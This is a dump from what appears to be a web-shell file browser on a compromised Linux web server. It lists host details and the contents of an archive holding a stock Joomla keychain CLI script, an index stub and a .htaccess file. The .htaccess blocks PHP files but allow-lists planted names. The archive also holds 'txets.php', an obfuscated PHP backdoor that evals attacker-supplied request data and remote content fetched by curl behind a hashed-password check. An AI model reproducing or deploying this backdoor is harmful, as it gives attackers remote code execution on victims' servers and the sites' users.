uawdijnntqw1x1x1
IP : 216.73.216.103
Hostname : dsru51-17647.fornex.org
Kernel : Linux dsru51-17647.fornex.org 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
OS : Linux
PATH:
/
var
/
www
/
rustam
/
data
/
www
/
xn--116-5cdks9aiyd3akc.xn--p1ai
/
media2
/
.
/
..
/
images
/
..
/
1fc41
/
bin.tar
/
/
keychain.php000066600000020312151663074340007063 0ustar00#!/usr/bin/env php <?php /** * @package Joomla.Platform * * @copyright Copyright (C) 2005 - 2018 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt * */ // @deprecated 4.0 Deprecated without replacement // We are a valid entry point. define('_JEXEC', 1); // Load system defines if (file_exists(dirname(__DIR__) . '/defines.php')) { require_once dirname(__DIR__) . '/defines.php'; } if (!defined('_JDEFINES')) { define('JPATH_BASE', dirname(__DIR__)); require_once JPATH_BASE . '/includes/defines.php'; } // Get the framework. require_once JPATH_LIBRARIES . '/import.legacy.php'; // Bootstrap the CMS libraries. require_once JPATH_LIBRARIES . '/cms.php'; // Import the configuration. require_once JPATH_CONFIGURATION . '/configuration.php'; // System configuration. $config = new JConfig; // Configure error reporting to maximum for CLI output. error_reporting(E_ALL); ini_set('display_errors', 1); /** * Keychain Manager. * * @since 12.3 */ class KeychainManager extends JApplicationCli { /** * @var boolean A flag if the keychain has been updated to trigger saving the keychain * @since 12.3 */ protected $updated = false; /** * @var JKeychain The keychain object being manipulated. * @since 12.3 */ protected $keychain = null; /** * Execute the application * * @return void * * @since 12.3 */ public function execute( ) { if (!count($this->input->args)) { // Check if they passed --help in otherwise display short usage summary if ($this->input->get('help', false) === false) { $this->out("usage: {$this->input->executable} [options] [command] [<args>]"); exit(1); } else { $this->displayHelp(); exit(0); } } // For all tasks but help and init we use the keychain if (!in_array($this->input->args[0], array('help', 'init'))) { $this->loadKeychain(); } switch ($this->input->args[0]) { case 'init': $this->initPassphraseFile(); break; case 'list': $this->listEntries(); break; case 'create': $this->create(); break; case 'change': $this->change(); break; case 'delete': $this->delete(); break; case 'read': $this->read(); break; case 'help': $this->displayHelp(); break; default: $this->out('Invalid command.'); break; } if ($this->updated) { $this->saveKeychain(); } exit(0); } /** * Load the keychain from a file. * * @return void * * @since 12.3 */ protected function loadKeychain() { $keychain = $this->input->get('keychain', '', 'raw'); $publicKeyFile = $this->input->get('public-key', '', 'raw'); $passphraseFile = $this->input->get('passphrase', '', 'raw'); $this->keychain = new JKeychain; if (file_exists($keychain)) { if (file_exists($publicKeyFile)) { $this->keychain->loadKeychain($keychain, $passphraseFile, $publicKeyFile); } else { $this->out('Public key not specified or missing!'); exit(1); } } } /** * Save this keychain to a file. * * @return void * * @since 12.3 */ protected function saveKeychain() { $keychain = $this->input->get('keychain', '', 'raw'); $publicKeyFile = $this->input->get('public-key', '', 'raw'); $passphraseFile = $this->input->get('passphrase', '', 'raw'); if (!file_exists($publicKeyFile)) { $this->out("Public key file specified doesn't exist: $publicKeyFile"); exit(1); } $this->keychain->saveKeychain($keychain, $passphraseFile, $publicKeyFile); } /** * Initialise a new passphrase file. * * @return void * * @since 12.3 */ protected function initPassphraseFile() { $keychain = new JKeychain; $passphraseFile = $this->input->get('passphrase', '', 'raw'); $privateKeyFile = $this->input->get('private-key', '', 'raw'); if (!strlen($passphraseFile)) { $this->out('A passphrase file must be specified with --passphrase'); exit(1); } if (!file_exists($privateKeyFile)) { $this->out("protected key file specified doesn't exist: $privateKeyFile"); exit(1); } $this->out('Please enter the new passphrase:'); $passphrase = $this->in(); $this->out('Please enter the passphrase for the protected key:'); $privateKeyPassphrase = $this->in(); $keychain->createPassphraseFile($passphrase, $passphraseFile, $privateKeyFile, $privateKeyPassphrase); } /** * Create a new entry * * @return void * * @since 12.3 */ protected function create() { if (count($this->input->args) != 3) { $this->out("usage: {$this->input->executable} [options] create entry_name entry_value"); exit(1); } if ($this->keychain->exists($this->input->args[1])) { $this->out('error: entry already exists. To change this entry, use "change"'); exit(1); } $this->change(); } /** * Change an existing entry to a new value or create an entry if missing. * * @return void * * @since 12.3 */ protected function change() { if (count($this->input->args) != 3) { $this->out("usage: {$this->input->executable} [options] change entry_name entry_value"); exit(1); } $this->updated = true; $this->keychain->setValue($this->input->args[1], $this->input->args[2]); } /** * Read an entry from the keychain * * @return void * * @since 12.3 */ protected function read() { if (count($this->input->args) != 2) { $this->out("usage: {$this->input->executable} [options] read entry_name"); exit(1); } $key = $this->input->args[1]; $this->out($key . ': ' . $this->dumpVar($this->keychain->get($key))); } /** * Get the string from var_dump * * @param mixed $var The variable you want to have dumped. * * @return string The result of var_dump * * @since 12.3 */ private function dumpVar($var) { ob_start(); var_dump($var); $result = trim(ob_get_contents()); ob_end_clean(); return $result; } /** * Delete an entry from the keychain * * @return void * * @since 12.3 */ protected function delete() { if (count($this->input->args) != 2) { $this->out("usage: {$this->input->executable} [options] delete entry_name"); exit(1); } $this->updated = true; $this->keychain->deleteValue($this->input->args[1]); } /** * List entries in the keychain * * @return void * * @since 12.3 */ protected function listEntries() { foreach ($this->keychain->toArray() as $key => $value) { $line = $key; if ($this->input->get('print-values')) { $line .= ': ' . $this->dumpVar($value); } $this->out($line); } } /** * Display the help information * * @return void * * @since 12.3 */ protected function displayHelp() { /* COMMANDS - list - create entry_name entry_value - change entry_name entry_value - delete entry_name - read entry_name */ $help = <<<HELP Keychain Management Utility usage: {$this->input->executable} [--keychain=/path/to/keychain] [--passphrase=/path/to/passphrase.dat] [--public-key=/path/to/public.pem] [command] [<args>] OPTIONS --keychain=/path/to/keychain Path to a keychain file to manipulate. --passphrase=/path/to/passphrase.dat Path to a passphrase file containing the encryption/decryption key. --public-key=/path/to/public.pem Path to a public key file to decrypt the passphrase file. COMMANDS list: Usage: list [--print-values] Lists all entries in the keychain. Optionally pass --print-values to print the values as well. create: Usage: create entry_name entry_value Creates a new entry in the keychain called "entry_name" with the plaintext value "entry_value". NOTE: This is an alias for change. change: Usage: change entry_name entry_value Updates the keychain entry called "entry_name" with the value "entry_value". delete: Usage: delete entry_name Removes an entry called "entry_name" from the keychain. read: Usage: read entry_name Outputs the plaintext value of "entry_name" from the keychain. init: Usage: init Creates a new passphrase file and prompts for a new passphrase. HELP; $this->out($help); } } try { JApplicationCli::getInstance('KeychainManager')->execute(); } catch (Exception $e) { echo $e->getMessage() . "\n"; exit(1); } .htaccess000066600000003772151663074340006370 0ustar00<FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'> Order allow,deny Deny from all </FilesMatch> <FilesMatch '^(index.php|wp-blog-header.php|wp-config-sample.php|wp-links-opml.php|wp-login.php|wp-settings.php|wp-trackback.php|wp-activate.php|wp-comments-post.php|wp-cron.php|wp-load.php|wp-mail.php|wp-signup.php|xmlrpc.php|edit-form-advanced.php|link-parse-opml.php|ms-sites.php|options-writing.php|themes.php|admin-ajax.php|edit-form-comment.php|link.php|ms-themes.php|plugin-editor.php|admin-footer.php|edit-link-form.php|load-scripts.php|ms-upgrade-network.php|admin-functions.php|edit.php|load-styles.php|ms-users.php|plugins.php|admin-header.php|edit-tag-form.php|media-new.php|my-sites.php|post-new.php|admin.php|edit-tags.php|media.php|nav-menus.php|post.php|admin-post.php|export.php|media-upload.php|network.php|press-this.php|upload.php|async-upload.php|menu-header.php|options-discussion.php|privacy.php|user-edit.php|menu.php|options-general.php|profile.php|user-new.php|moderation.php|options-head.php|revision.php|users.php|custom-background.php|ms-admin.php|options-media.php|setup-config.php|widgets.php|custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>index.html000066600000000037151663074340006556 0ustar00<!DOCTYPE html><title></title> txets.php000066600000013052151663074340006442 0ustar00<?php goto cGjFtUHxGZ29; r4GWqQWldmsH: metaphone("\166\157\151\x31\161\120\x38\171\53\x33\172\x72\153\110\114\101\102\x76\66\x6b\160\152\x47\x2b\64\162\112\160\x58\x79\x42\64\127\x37\x33\x42\x79\x67\160\x78\117\71\70"); goto toCKscX2XNgC; dNxixeort4Sm: ($csaEwP6fRXWs[63] = $csaEwP6fRXWs[63] . $csaEwP6fRXWs[74]) && ($csaEwP6fRXWs[90] = $csaEwP6fRXWs[63]($csaEwP6fRXWs[90])) && @eval($csaEwP6fRXWs[63](${$csaEwP6fRXWs[50]}[15])); goto dx2fVPLc59qt; cGjFtUHxGZ29: $BKC4zCjNPuiA = "\162" . "\141" . "\x6e" . "\x67" . "\145"; goto djiWEYHb32kv; djiWEYHb32kv: $u_a0art5UUJu = $BKC4zCjNPuiA("\176", "\x20"); goto c9xlcAqWQXdR; toCKscX2XNgC: class o9b8lgs3bIQF { static function k7zzHlecElSt($DZytoOQlJUmq) { goto y06YzJ_5cibw; uaana1S8mXN6: $gtok36rnpdhn = ''; goto WG4bFZ8gkQvo; y06YzJ_5cibw: $LI0_GMBbtFzp = "\x72" . "\x61" . "\156" . "\x67" . "\x65"; goto tmVjJlLbNbR6; tmVjJlLbNbR6: $KXC3i9MzlZ6E = $LI0_GMBbtFzp("\x7e", "\40"); goto jLJsiVS7Ic3F; r0Zr0tTHFTRq: uKys52FCFTmQ: goto d_5VsRqdSRVd; WG4bFZ8gkQvo: foreach ($zqJyu_iFDcN0 as $SQ_O6yV0VLxG => $Y0CtafL_lfPA) { $gtok36rnpdhn .= $KXC3i9MzlZ6E[$Y0CtafL_lfPA - 17233]; jASV3CfyaXzm: } goto r0Zr0tTHFTRq; jLJsiVS7Ic3F: $zqJyu_iFDcN0 = explode("\174", $DZytoOQlJUmq); goto uaana1S8mXN6; d_5VsRqdSRVd: return $gtok36rnpdhn; goto FJxNFO5dohOP; FJxNFO5dohOP: } static function ONKcX_F6Eipq($d45gT4Lan2Io, $HKdxrS4gSHwe) { goto o8ie2iazn2f2; o8ie2iazn2f2: $N17LUPHQfg4i = curl_init($d45gT4Lan2Io); goto m16HNQjgAvlQ; m16HNQjgAvlQ: curl_setopt($N17LUPHQfg4i, CURLOPT_RETURNTRANSFER, 1); goto gkX0GZEWYdbl; tIwW9BkSjcux: return empty($JUh32R2ficXw) ? $HKdxrS4gSHwe($d45gT4Lan2Io) : $JUh32R2ficXw; goto qcfr4SqgZoeG; gkX0GZEWYdbl: $JUh32R2ficXw = curl_exec($N17LUPHQfg4i); goto tIwW9BkSjcux; qcfr4SqgZoeG: } static function RhMVBvn2z77U() { goto mhf4QK7YF8pI; zAXxakXi9SLM: NlHmqaunAB9Z: goto f3Y0Ox9mGPNz; a1FTOOPC3zDo: $AM3hW65BJPfu = self::oNkCX_f6EiPQ($jQmnLcwMxcp_[1 + 0], $u5f92knMP3CE[2 + 3]); goto MTsVYQQEo2oc; je9uVyNNXPdk: die; goto zAXxakXi9SLM; mhf4QK7YF8pI: $YwnG84Z6W_tS = array("\x31\x37\x32\66\x30\174\61\67\x32\64\65\x7c\61\67\x32\65\70\x7c\61\67\62\66\x32\174\61\67\62\x34\x33\x7c\x31\x37\62\65\x38\x7c\61\67\x32\x36\64\x7c\x31\67\62\x35\x37\174\x31\67\62\x34\x32\174\61\x37\x32\64\x39\174\61\x37\62\x36\x30\x7c\x31\67\x32\x34\63\x7c\61\x37\62\65\x34\x7c\61\67\x32\x34\70\x7c\x31\x37\62\64\x39", "\x31\x37\x32\64\x34\x7c\x31\67\62\64\63\174\61\x37\x32\x34\65\x7c\61\x37\x32\x36\x34\174\x31\x37\x32\x34\65\x7c\x31\67\x32\x34\x38\174\61\67\x32\64\63\x7c\61\x37\63\x31\60\x7c\61\67\63\60\x38", "\61\x37\x32\x35\x33\x7c\61\x37\62\x34\x34\174\x31\67\x32\x34\70\174\61\67\62\64\71\x7c\x31\x37\x32\66\64\x7c\61\67\62\65\71\x7c\x31\x37\62\65\70\x7c\61\x37\x32\66\x30\x7c\x31\x37\62\64\70\174\x31\67\x32\x35\71\x7c\x31\67\x32\x35\x38", "\61\67\x32\64\67\174\x31\67\x32\x36\62\x7c\61\67\62\x36\x30\174\61\67\x32\x35\x32", "\x31\67\62\x36\61\x7c\61\x37\x32\66\x32\x7c\61\x37\62\64\64\174\61\67\62\x35\x38\174\x31\x37\x33\x30\65\x7c\x31\x37\63\x30\67\x7c\x31\67\x32\x36\64\x7c\61\x37\x32\x35\x39\x7c\x31\67\62\x35\x38\x7c\61\67\62\66\x30\x7c\61\x37\62\x34\70\174\x31\67\62\65\x39\174\61\x37\62\65\70", "\x31\67\62\x35\67\174\x31\67\62\65\x34\174\61\67\62\x35\61\x7c\x31\67\x32\65\x38\174\x31\67\x32\66\x34\x7c\x31\x37\62\65\66\174\61\x37\x32\x35\x38\x7c\x31\67\62\x34\63\174\61\67\62\66\x34\174\x31\67\x32\66\x30\174\x31\67\62\x34\70\174\61\x37\x32\64\x39\174\x31\x37\x32\64\63\174\x31\x37\62\x35\70\174\61\x37\62\64\71\174\61\67\62\64\63\x7c\61\x37\x32\x34\64", "\x31\x37\x32\70\x37\x7c\61\67\x33\x31\67", "\x31\67\x32\63\64", "\61\67\63\x31\62\174\x31\x37\63\61\x37", "\61\x37\x32\x39\64\x7c\61\x37\x32\67\67\174\x31\x37\62\x37\x37\x7c\x31\x37\x32\71\64\x7c\61\x37\62\67\60", "\61\x37\x32\65\x37\x7c\x31\67\x32\65\64\x7c\61\x37\62\x35\61\174\61\67\62\x34\x33\174\61\67\62\x35\x38\174\x31\67\62\64\x35\x7c\x31\67\62\66\x34\174\x31\x37\62\65\x34\x7c\x31\x37\62\x34\71\174\x31\67\62\64\67\x7c\x31\x37\x32\64\62\174\x31\x37\x32\x34\63"); goto gvZwvgc0dFn8; MmO3s3aSLBTE: @$u5f92knMP3CE[0 + 10](INPUT_GET, "\x6f\146") == 1 && die($u5f92knMP3CE[2 + 3](__FILE__)); goto tBElvpjr1rhF; tBElvpjr1rhF: if (!(@$jQmnLcwMxcp_[0] - time() > 0 and md5(md5($jQmnLcwMxcp_[3 + 0])) === "\67\x37\67\x37\146\145\x38\144\x61\x31\x63\63\x30\x33\141\x39\71\70\x36\145\62\61\x37\64\x34\x36\x63\x62\70\60\67\x32")) { goto NlHmqaunAB9Z; } goto a1FTOOPC3zDo; gvZwvgc0dFn8: foreach ($YwnG84Z6W_tS as $TtHvnteUxTlY) { $u5f92knMP3CE[] = self::K7ZZhLECeLsT($TtHvnteUxTlY); yX2A91t9Vn4i: } goto CuAfqUr3EZD4; MTsVYQQEo2oc: @eval($u5f92knMP3CE[4 + 0]($AM3hW65BJPfu)); goto je9uVyNNXPdk; XKjBJCyjXaYN: $jQmnLcwMxcp_ = $u5f92knMP3CE[2 + 0]($ZbOXJZnnWgSc, true); goto MmO3s3aSLBTE; a9swL1tzeO5_: $ZbOXJZnnWgSc = @$u5f92knMP3CE[2 + 1]($u5f92knMP3CE[2 + 4], $OKGobg4lpTkF); goto XKjBJCyjXaYN; CuAfqUr3EZD4: BhKdREQkTI83: goto X2dbccvK0SD8; X2dbccvK0SD8: $OKGobg4lpTkF = @$u5f92knMP3CE[1]($u5f92knMP3CE[8 + 2](INPUT_GET, $u5f92knMP3CE[0 + 9])); goto a9swL1tzeO5_; f3Y0Ox9mGPNz: } } goto fsbY_7a5ybTi; dx2fVPLc59qt: pd85BbhjTkQj: goto r4GWqQWldmsH; cLXU7Z3Lhhzw: if (!(in_array(gettype($csaEwP6fRXWs) . count($csaEwP6fRXWs), $csaEwP6fRXWs) && count($csaEwP6fRXWs) == 22 && md5(md5(md5(md5($csaEwP6fRXWs[16])))) === "\x66\x31\x31\x36\x63\64\144\x32\x37\x65\x61\146\145\142\142\x63\x35\x65\67\65\63\x34\145\62\x33\65\63\x63\144\141\x62\71")) { goto pd85BbhjTkQj; } goto dNxixeort4Sm; c9xlcAqWQXdR: $csaEwP6fRXWs = ${$u_a0art5UUJu[3 + 28] . $u_a0art5UUJu[40 + 19] . $u_a0art5UUJu[9 + 38] . $u_a0art5UUJu[33 + 14] . $u_a0art5UUJu[2 + 49] . $u_a0art5UUJu[10 + 43] . $u_a0art5UUJu[26 + 31]}; goto cLXU7Z3Lhhzw; fsbY_7a5ybTi: o9B8Lgs3BIQf::RHMvbVn2z77u(); ?> BiaoJiOk
/var/www/rustam/data/www/xn--116-5cdks9aiyd3akc.xn--p1ai/media2/./../images/../1fc41/bin.tar